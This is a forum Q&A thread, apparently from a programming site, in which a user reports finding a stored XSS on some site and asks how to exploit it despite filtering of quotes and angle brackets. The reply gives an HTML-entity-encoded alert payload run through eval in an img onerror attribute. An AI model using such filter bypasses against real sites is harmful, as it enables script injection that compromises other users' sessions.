# Exploit the xss vulnerability with php code

Tags: php, html, security, xss

I found a stored xss.
Code lines like this;

```html
<img class="br64 mr15" onerror="this.onerror=null;this.src=`https://www.examplesite.zcs/default.png`;" width="100" height="100" src="xss is here">
```

The problem is that the system inserts a \ before every quotation mark I put, deleted "<>" characters.
Can I take advantage of this stored xss?

If I get over these obstacles, I'm thinking of exiting the `<img>` tag I'm in and starting a `<?php` tag.

Comment: I can escape the specified src tag and start a console.log tag or something, but I can't use quotes and <> at all.

Comment: Where is the SQL?

Answer (score -1):

Try HTML Encoding the payload
I used https://onlinetexttools.com/html-encode-text to encode `alert('1')` which yeilded `&#97;&#108;&#101;&#114;&#116;&lpar;&apos;&#49;&apos;&rpar;` and I simply called the eval function

```
<img class="br64 mr15" src='badurl.png' onerror="eval(&#97;&#108;&#101;&#114;&#116;&lpar;&apos;&#49;&apos;&rpar;);" width="100" height="100" src="xss is here">
```

As you see above, there are no quotes or <> tags (though you could use them too with HTML encode).

Here is the JS Fiddle https://jsfiddle.net/2jb90g43/